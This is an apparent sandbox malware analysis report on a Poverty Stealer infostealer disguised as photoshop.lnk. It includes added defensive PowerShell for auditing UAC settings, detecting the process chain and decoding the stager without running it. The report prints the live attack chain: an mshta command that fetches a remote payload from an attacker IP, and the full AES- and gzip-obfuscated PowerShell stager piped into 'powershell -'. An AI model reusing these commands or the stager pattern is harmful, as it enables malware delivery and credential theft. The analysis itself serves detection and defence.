Malware Analysis Report

2024-10-23 17:19

Sample ID 240304-y25r9sdb46
Target photoshop.lnk
SHA256 704c6726ac624046f3a428f5dd6c1e461d9172cea5cdb313f176d361454a0419
Tags
povertystealer evasion spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

704c6726ac624046f3a428f5dd6c1e461d9172cea5cdb313f176d361454a0419

Threat Level: Known bad

The file photoshop.lnk was found to be: Known bad.

Malicious Activity Summary

povertystealer evasion spyware stealer trojan upx

Poverty Stealer

Detect Poverty Stealer Payload

UAC bypass

Downloads MZ/PE file

Blocklisted process makes network request

UPX packed file

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-04 20:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-04 20:17

Reported

2024-03-04 20:20

Platform

win10v2004-20240226-en

Max time kernel

147s

Max time network

154s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

Signatures

Detect Poverty Stealer Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Poverty Stealer

stealer povertystealer

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
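ConsentPromptBehaviorAdmin = 0 means "elevate without prompting" for members of the Administrators group; the Windows default is 5 (prompt for consent for non-Windows binaries). Because the value lives under HKLM, the powershell.exe that wrote it was already running with an elevated token, so the effect of this indicator is that later elevations on the host succeed silently rather than that unprivileged code bypassed UAC. The following PowerShell is an added example and not part of the sandbox report: it reads the UAC policy values this indicator touches, compares them with the Windows defaults, and offers a WhatIf-capable repair. The baseline values and the set of keys checked are this example's own choices.

```powershell
# Added example (not from the report): audit the UAC policy values under
# HKLM\...\Policies\System and flag the state this sample writes
# (ConsentPromptBehaviorAdmin = 0, "elevate without prompting").

$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Windows default values (baseline chosen for this example) and what a deviation means.
$Expected = @{
    EnableLUA                  = 1   # 0 = UAC disabled entirely (takes effect after reboot)
    ConsentPromptBehaviorAdmin = 5   # 0 = elevate silently; 5 = prompt for non-Windows binaries
    PromptOnSecureDesktop      = 1   # 0 = prompt is drawn on the interactive desktop, not the secure one
}

function Get-UacPosture {
    param([string]$Key = $UacKey, [hashtable]$Baseline = $Expected)
    $props = Get-ItemProperty -Path $Key -ErrorAction Stop
    foreach ($name in ($Baseline.Keys | Sort-Object)) {
        $actual = $props.$name          # $null when the value is absent (policy not set)
        if ($null -eq $actual)                 { $status = 'missing' }
        elseif ($actual -eq $Baseline[$name])  { $status = 'ok' }
        else                                   { $status = 'DEVIATES' }
        [pscustomobject]@{
            Setting  = $name
            Actual   = $actual
            Expected = $Baseline[$name]
            Status   = $status
        }
    }
}

function Repair-UacPosture {
    # Restores the baseline. Needs an elevated shell; run with -WhatIf first.
    [CmdletBinding(SupportsShouldProcess)]
    param([string]$Key = $UacKey, [hashtable]$Baseline = $Expected)
    foreach ($name in $Baseline.Keys) {
        if ($PSCmdlet.ShouldProcess("$Key\$name", "Set to $($Baseline[$name])")) {
            Set-ItemProperty -Path $Key -Name $name -Value $Baseline[$name] -Type DWord
        }
    }
}

$posture = Get-UacPosture
$posture | Format-Table -AutoSize
if ($posture | Where-Object Status -eq 'DEVIATES') {
    Write-Warning 'UAC policy deviates from baseline; review the process that changed it before running Repair-UacPosture.'
}
```

A host where Get-UacPosture reports ConsentPromptBehaviorAdmin as 0 should be treated as already compromised at administrator level, since the write itself required elevation; the repair restores the prompt but does not remove whatever made the change.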

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\mshta.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Lyrufos.exe | N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Program crash

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Photoshop_Set-Up.exe = "11001" | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1488 wrote to memory of 3680 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\forfiles.exe
PID 1488 wrote to memory of 3680 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\forfiles.exe
PID 3680 wrote to memory of 4468 | N/A | C:\Windows\System32\forfiles.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3680 wrote to memory of 4468 | N/A | C:\Windows\System32\forfiles.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4468 wrote to memory of 3076 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\mshta.exe
PID 4468 wrote to memory of 3076 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\mshta.exe
PID 3076 wrote to memory of 2336 | N/A | C:\Windows\system32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3076 wrote to memory of 2336 | N/A | C:\Windows\system32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2336 wrote to memory of 4932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2336 wrote to memory of 4932 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
PID 4932 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
PID 4932 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe
PID 4932 wrote to memory of 3168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Lyrufos.exe
PID 4932 wrote to memory of 3168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Lyrufos.exe
PID 4932 wrote to memory of 3168 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Lyrufos.exe
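The parent/child pairs above coincide with the process tree in the Processes section, so the table reads as the spawn chain: cmd.exe (from the .lnk) runs forfiles.exe, which is used purely as a proxy to start powershell.exe; that starts mshta.exe against an http URL; mshta.exe spawns a second powershell.exe with -w 1 -ep Unrestricted -nop; that pipes a decrypted script into a third powershell.exe invoked with a bare "-" (read the script from stdin, so it never appears on any command line); and the third one writes and runs the droppers under AppData\Roaming. The following PowerShell is an added example and not part of the sandbox report: it expresses each hop as a rule and runs the rules over a small set of constructed process-creation events modelled on the Processes section. The record shape is a simplified Sysmon Event ID 1 (field names are this example's assumptions), and the parent of the first cmd.exe is not in the report and is set to explorer.exe here.

```powershell
# Added example (not from the report): rules for the proxied execution chain
# cmd -> forfiles -> powershell -> mshta -> powershell -> powershell -> dropped EXE,
# run over constructed process-creation events.

# Constructed events modelled on the Processes section (simplified Sysmon Event ID 1
# shape; field names are assumptions; the parent of PID 1488 is an assumption).
$PS = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$Events = @(
    [pscustomobject]@{ ProcessId = 1488; ParentProcessId = 0; ParentImage = 'C:\Windows\explorer.exe'
        Image = 'C:\Windows\system32\cmd.exe'
        CommandLine = 'cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk' }
    [pscustomobject]@{ ProcessId = 3680; ParentProcessId = 1488; ParentImage = 'C:\Windows\system32\cmd.exe'
        Image = 'C:\Windows\System32\forfiles.exe'
        CommandLine = '"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Lar/photoshop' }
    [pscustomobject]@{ ProcessId = 4468; ParentProcessId = 3680; ParentImage = 'C:\Windows\System32\forfiles.exe'
        Image = $PS; CommandLine = 'start mshta http://91.92.251.35/Downloads/Lar/photoshop' }
    [pscustomobject]@{ ProcessId = 3076; ParentProcessId = 4468; ParentImage = $PS
        Image = 'C:\Windows\system32\mshta.exe'
        CommandLine = '"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Lar/photoshop' }
    [pscustomobject]@{ ProcessId = 2336; ParentProcessId = 3076; ParentImage = 'C:\Windows\system32\mshta.exe'
        Image = $PS
        CommandLine = '"' + $PS + '" -w 1 -ep Unrestricted -nop $Doaj = <elided>; $DwCaBfh | powershell -' }
    [pscustomobject]@{ ProcessId = 4932; ParentProcessId = 2336; ParentImage = $PS
        Image = $PS; CommandLine = '"' + $PS + '" -' }
    [pscustomobject]@{ ProcessId = 2440; ParentProcessId = 4932; ParentImage = $PS
        Image = 'C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe'
        CommandLine = '"C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe"' }
    [pscustomobject]@{ ProcessId = 3168; ParentProcessId = 4932; ParentImage = $PS
        Image = 'C:\Users\Admin\AppData\Roaming\Lyrufos.exe'
        CommandLine = '"C:\Users\Admin\AppData\Roaming\Lyrufos.exe"' }
)

# One rule per hop observed in the report. Each Test receives one event.
$Rules = @(
    @{ Name = 'forfiles.exe used as an execution proxy'
       Test = { param($e) $e.ParentImage -like '*\forfiles.exe' -and
                          $e.Image -match '\\(powershell|pwsh|cmd|mshta)\.exe$' } }
    @{ Name = 'mshta.exe fetching remote content'
       Test = { param($e) $e.Image -like '*\mshta.exe' -and $e.CommandLine -match '\bhttps?://' } }
    @{ Name = 'PowerShell hidden/no-profile with relaxed execution policy'
       Test = { param($e) $e.Image -like '*\powershell.exe' -and
                          $e.CommandLine -match '\s-(ep|ex|exec|executionpolicy)\s+(unrestricted|bypass)\b' -and
                          $e.CommandLine -match '\s-(nop|noprofile|w\s+1|windowstyle\s+hidden)\b' } }
    @{ Name = 'PowerShell reading its script from stdin (bare "-")'
       # Matches only when the whole command line is the binary plus "-".
       Test = { param($e) $e.Image -like '*\powershell.exe' -and
                          $e.CommandLine -match '^"?[^"]*\\powershell\.exe"?\s+-\s*$' } }
    @{ Name = 'mshta.exe <-> powershell.exe parent/child hop'
       Test = { param($e) ($e.ParentImage -like '*\mshta.exe' -and $e.Image -like '*\powershell.exe') -or
                          ($e.ParentImage -like '*\powershell.exe' -and $e.Image -like '*\mshta.exe') } }
    @{ Name = 'Executable under AppData\Roaming launched by a script host'
       Test = { param($e) $e.Image -match '\\AppData\\Roaming\\[^\\]+\.exe$' -and
                          $e.ParentImage -match '\\(powershell|pwsh|wscript|cscript|mshta)\.exe$' } }
)

function Test-ProcessChain {
    param([Parameter(Mandatory)][object[]]$Events, [Parameter(Mandatory)][hashtable[]]$Rules)
    foreach ($e in $Events) {
        foreach ($r in $Rules) {
            if (& $r.Test $e) {
                [pscustomobject]@{ Rule = $r.Name; ProcessId = $e.ProcessId; Image = $e.Image; Parent = $e.ParentImage }
            }
        }
    }
}

function Get-Ancestry {
    # Walks ParentProcessId back to the root and prints "image (pid) -> ...".
    param([Parameter(Mandatory)]$Event, [Parameter(Mandatory)][object[]]$Events)
    $byPid = @{}; foreach ($x in $Events) { $byPid[$x.ProcessId] = $x }
    $chain = New-Object System.Collections.Generic.List[string]
    $cur = $Event
    while ($cur) {
        $chain.Insert(0, ('{0} ({1})' -f (($cur.Image -split '\\')[-1]), $cur.ProcessId))
        $cur = $byPid[$cur.ParentProcessId]      # $null once the root is reached
    }
    $chain -join ' -> '
}

Test-ProcessChain -Events $Events -Rules $Rules | Format-Table -AutoSize
$Events | Where-Object { $_.Image -like '*\AppData\Roaming\*.exe' } |
    ForEach-Object { Get-Ancestry -Event $_ -Events $Events }
```

Against the constructed events the rules fire on every hop from PID 4468 onwards, and the ancestry of each dropper comes out as cmd.exe (1488) -> forfiles.exe (3680) -> powershell.exe (4468) -> mshta.exe (3076) -> powershell.exe (2336) -> powershell.exe (4932) -> the dropper, matching the table. The stdin rule is the one worth keeping in production telemetry: a command line that is nothing but powershell.exe and "-" is rare in legitimate automation and is how this stager keeps the decrypted stage off the command-line audit trail.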

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\photoshop.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Lar/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta http://91.92.251.35/Downloads/Lar/photoshop

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Lar/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $Doaj = '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';$lOdvDYPo = 'amJEcXN5b0lPZmRjc2xxQUhTbGtrdU5YTEtKeGFETHg=';$XTxbjY = New-Object 'System.Security.Cryptography.AesManaged';$XTxbjY.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XTxbjY.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XTxbjY.BlockSize = 128;$XTxbjY.KeySize = 256;$XTxbjY.Key = [System.Convert]::FromBase64String($lOdvDYPo);$lLqsN = [System.Convert]::FromBase64String($Doaj);$sXEuQEMv = $lLqsN[0..15];$XTxbjY.IV = $sXEuQEMv;$QHNqwuDDj = $XTxbjY.CreateDecryptor();$xXmWRVZMX = $QHNqwuDDj.TransformFinalBlock($lLqsN, 16, $lLqsN.Length - 16);$XTxbjY.Dispose();$VJJYW = New-Object System.IO.MemoryStream( , $xXmWRVZMX );$XqxWhNb = New-Object System.IO.MemoryStream;$LAISYiBmx = New-Object System.IO.Compression.GzipStream $VJJYW, ([IO.Compression.CompressionMode]::Decompress);$LAISYiBmx.CopyTo( $XqxWhNb );$LAISYiBmx.Close();$VJJYW.Close();[byte[]] $VlUkz = $XqxWhNb.ToArray();$DwCaBfh = [System.Text.Encoding]::UTF8.GetString($VlUkz);$DwCaBfh | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe

"C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe"

C:\Users\Admin\AppData\Roaming\Lyrufos.exe

"C:\Users\Admin\AppData\Roaming\Lyrufos.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2440 -ip 2440

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 1860
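The second powershell.exe entry above carries the whole decode routine for the next stage: base64-decode $Doaj, treat the first 16 bytes as an IV, decrypt the remainder with AES-256 in ECB mode and Zeros padding using the base64 key in $lOdvDYPo, gunzip the result, decode it as UTF-8 and pipe the text into "powershell -" so it executes from stdin. Two details matter for analysis. ECB ignores the IV entirely, so the 16 "IV" bytes are just a skipped prefix, and every identical 16-byte plaintext block encrypts to the same ciphertext block. The key base64 string decodes to exactly 32 bytes, all printable ASCII letters, which is typical of a randomly generated text key pasted into a builder. The following PowerShell is an added example and not the sample's own code: it reproduces the decode pipeline in a defanged form that writes the recovered script to disk instead of executing it. Because the ciphertext on this page is elided, the example also includes a matching encryptor and a constructed stand-in payload so the round trip can be run; with a real blob, $Blob is set to the captured $Doaj value instead.

```powershell
# Added example (not the sample's own code): defanged re-implementation of the stager's
# decode pipeline: base64 -> skip 16 bytes -> AES-256/ECB/Zeros -> gzip -> UTF-8, ending
# in a file write instead of "| powershell -". The ciphertext is elided on the page, so a
# matching encryptor and a constructed stand-in payload demonstrate the round trip.

$KeyB64 = 'amJEcXN5b0lPZmRjc2xxQUhTbGtrdU5YTEtKeGFETHg='   # $lOdvDYPo from the captured command line

function New-StagerCipher {
    param([Parameter(Mandatory)][byte[]]$Key)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode      = [System.Security.Cryptography.CipherMode]::ECB
    $aes.Padding   = [System.Security.Cryptography.PaddingMode]::Zeros
    $aes.BlockSize = 128
    $aes.KeySize   = 256
    $aes.Key       = $Key
    $aes
}

function Unprotect-Stage {
    # Mirrors the stager. The first 16 bytes are assigned to .IV exactly as the sample does,
    # but ECB never uses the IV, so they are simply a prefix that is skipped.
    param([Parameter(Mandatory)][string]$Blob, [Parameter(Mandatory)][string]$KeyB64)
    $aes  = New-StagerCipher -Key ([Convert]::FromBase64String($KeyB64))
    $data = [Convert]::FromBase64String($Blob)
    $aes.IV = $data[0..15]
    $dec  = $aes.CreateDecryptor()
    $gz   = $dec.TransformFinalBlock($data, 16, $data.Length - 16)
    $aes.Dispose()
    # Zeros padding is not stripped by the decryptor; the gzip member carries its own
    # length, so the trailing zero bytes after it are ignored by the decompressor.
    $in  = New-Object System.IO.MemoryStream -ArgumentList (,$gz)
    $out = New-Object System.IO.MemoryStream
    $gs  = New-Object System.IO.Compression.GzipStream $in, ([IO.Compression.CompressionMode]::Decompress)
    $gs.CopyTo($out); $gs.Close(); $in.Close()
    [System.Text.Encoding]::UTF8.GetString($out.ToArray())
}

function Protect-Stage {
    # Inverse of Unprotect-Stage, used here only to build a test blob. The 16-byte prefix is
    # random; with ECB it has no cryptographic effect.
    param([Parameter(Mandatory)][string]$Script, [Parameter(Mandatory)][string]$KeyB64)
    $raw   = New-Object System.IO.MemoryStream
    $gs    = New-Object System.IO.Compression.GzipStream $raw, ([IO.Compression.CompressionMode]::Compress)
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($Script)
    $gs.Write($bytes, 0, $bytes.Length); $gs.Close()
    $gz    = $raw.ToArray()
    $aes   = New-StagerCipher -Key ([Convert]::FromBase64String($KeyB64))
    $ct    = $aes.CreateEncryptor().TransformFinalBlock($gz, 0, $gz.Length)
    $aes.Dispose()
    $prefix = New-Object byte[] 16
    [System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($prefix)
    [Convert]::ToBase64String([byte[]]($prefix + $ct))
}

# Key inspection: 32 bytes of printable ASCII.
$keyBytes = [Convert]::FromBase64String($KeyB64)
'{0}-byte key: {1}' -f $keyBytes.Length, [System.Text.Encoding]::ASCII.GetString($keyBytes)

# Constructed stand-in for the elided second stage (not the real payload).
$StandIn   = 'Write-Output "stage two would run here"'
$Blob      = Protect-Stage -Script $StandIn -KeyB64 $KeyB64      # replace with the captured $Doaj for a real sample
$Recovered = Unprotect-Stage -Blob $Blob -KeyB64 $KeyB64
$Recovered.TrimEnd([char]0) -eq $StandIn                          # True for the round trip

# Defanged sink: write, do not execute.
Set-Content -Path .\stage2.ps1 -Value $Recovered -Encoding UTF8
```

The only change from the sample's own pipeline is the last line: the recovered text goes to stage2.ps1 for reading rather than to a child powershell.exe. Run the recovery in an isolated analysis VM regardless, since the captured blob is attacker-controlled input.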

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp
NL | 91.92.251.35:80 | 91.92.251.35 | tcp
US | 8.8.8.8:53 | 178.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 35.251.92.91.in-addr.arpa | udp
US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp
NL | 91.92.251.35:80 | 91.92.251.35 | tcp
DE | 146.70.169.164:2227 |  | tcp
US | 8.8.8.8:53 | 164.169.70.146.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 160.30.22.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 200.64.52.20.in-addr.arpa | udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_itd2eveg.3wy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4468-0-0x0000023147190000-0x00000231471B2000-memory.dmp

memory/4468-10-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp

memory/4468-11-0x00000231472E0000-0x00000231472F0000-memory.dmp

memory/4468-12-0x00000231472E0000-0x00000231472F0000-memory.dmp

memory/4468-13-0x00000231472E0000-0x00000231472F0000-memory.dmp

memory/4468-16-0x00007FFF16170000-0x00007FFF16C31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/2336-33-0x000001C28C120000-0x000001C28C130000-memory.dmp

memory/2336-32-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

memory/2336-34-0x000001C28C120000-0x000001C28C130000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3ca1082427d7b2cd417d7c0b7fd95e4e
SHA1 b0482ff5b58ffff4f5242d77330b064190f269d3
SHA256 31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512 bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

memory/2336-36-0x000001C28C120000-0x000001C28C130000-memory.dmp

memory/4932-46-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

memory/4932-48-0x0000018320040000-0x0000018320050000-memory.dmp

memory/4932-47-0x0000018320040000-0x0000018320050000-memory.dmp

memory/4932-49-0x000001833A6C0000-0x000001833A704000-memory.dmp

memory/4932-50-0x000001833AAF0000-0x000001833AB66000-memory.dmp

C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe

MD5 c56adb18f4440a6c085141c508256cbd
SHA1 9ac2fef2d12260c1e717d8de61b8a42840a1cac4
SHA256 1cde83baf8606ef1df93264cdfa6af9889fbe4bd03f5584df62119d048f7687a
SHA512 4457a323d9d96383e525c796fb9d440ff9ab5827f0616b4a12ccf535e18985aa4972d6d62d29112b5a7e2bc82f567201d15ed9becac84bed5e2ee298c00d7429

C:\Users\Admin\AppData\Roaming\Photoshop_Set-Up.exe

MD5 b6f4b0ce8d68fa8a3d2ed69a50f4a8da
SHA1 c8037db70d2c53f0efbc746efabf7968d6d09e1a
SHA256 796c2a6de48e4206f14a87f6770990fd663423b2b1ce1ddef9a510123f2c5ead
SHA512 7d0860bf32135f545352be88d2b942979fc56bc37e6fa58068fc40c205a2ddc9d1255f1785ceb4e361110482b44105c30116d72b7a9d955d68849a2d54093bb2

memory/2440-61-0x0000000000620000-0x0000000000F72000-memory.dmp

C:\Users\Admin\AppData\Roaming\Lyrufos.exe

MD5 16db89328ce227006c153728c0ade1ae
SHA1 effd7c2992e64fa2d266b92054d3dee5f1e950f5
SHA256 69962181ff1d9d8f9dc80b1f91f8963aeb423f4e06f25ce3e81d22e16e1866ab
SHA512 6e1f7094d0b7b5788c8f6bf211b452d417b1ad1a0720d0fe59b3ec9d1af978d0108acb0b53a6d002245603b68e607c5297f2c01ec18fcaf6634bae02b7c26fd5

memory/4932-71-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

memory/2336-73-0x00007FFF163F0000-0x00007FFF16EB1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\index.html

MD5 a28ab17b18ff254173dfeef03245efd0
SHA1 c6ce20924565644601d4e0dd0fba9dde8dea5c77
SHA256 886c0ab69e6e9d9d5b5909451640ea587accfcdf11b8369cad8542d1626ac375
SHA512 9371a699921b028bd93c35f9f2896d9997b906c8aba90dd4279abba0ae1909a8808a43bf829584e552ccfe534b2c991a5a7e3e3de7618343f50b1c47cff269d6

C:\Users\Admin\AppData\Local\Temp\{2273A23D-1AAC-4CE4-B310-958937CCF49A}\CCDInstaller.js

MD5 e96bb3da47f4a3319b80f23051bdeb16
SHA1 c9913b052c5c7a59e100fe18357fddc1023161ea
